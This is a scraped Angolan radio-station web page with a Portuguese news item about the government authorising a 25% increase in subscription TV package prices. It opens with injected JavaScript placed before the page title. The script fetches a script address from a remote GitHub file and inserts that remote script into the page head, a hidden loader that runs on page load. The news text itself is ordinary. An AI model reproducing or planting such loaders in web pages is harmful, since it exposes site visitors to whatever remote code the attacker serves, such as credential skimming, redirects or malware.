;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Economia sem makas: Governo autorizou o aumento de 25% no preço dos pacotes de televisão por subscrição | RadioPlayDigital
Economia sem makas: Governo autorizou o aumento de 25% no preço dos pacotes de televisão por subscrição

O Governo autorizou o aumento de 25% no preço dos pacotes de televisão por subscrição. A partir de agora, a TV Capo, DSTV e Zap têm “carta aberta” para subir o valor dos pacotes.

Este aumento, decidido pelo Instituto Angolano das Comunicações (INACOM), responde aos pedidos das operadoras. No ano passado, por exemplo, a DSTV, e a TV Cabo pretendiam aumentar os preços dos serviços, justificando com a necessidade de cobrir a desvalorização cambial.

O Governo justifica a decisão com o “impacto negativo da inflação e da variação cambial nos custos operacionais e na manutenção das redes dos operadores prestadores dos serviços de televisão por subscrição”. De acordo com o INACOM, a falta de um aumento do preço dos pactos pode “colocar a sustentabilidade financeira das operadoras em risco e comprometer o fornecimento dos serviços com a qualidade desejada dos consumidores”.

Caso as operadoras decidam aumentar o preço dos pacotes, o INACOM indica que devem submeter um mapa dos pacotes contendo o preço actual, o preço ajustado e o percentual aplicado e a composição dos pacotes. Em caso de ajuste gradual dos pacotes, as operadoras também estão sujeitas a solicitar a homologação sempre que se verificar um ajuste.

Data de Emissão: 02-08-2024 às 07:10
Género(s): Economia, Opinião
 

Relacionados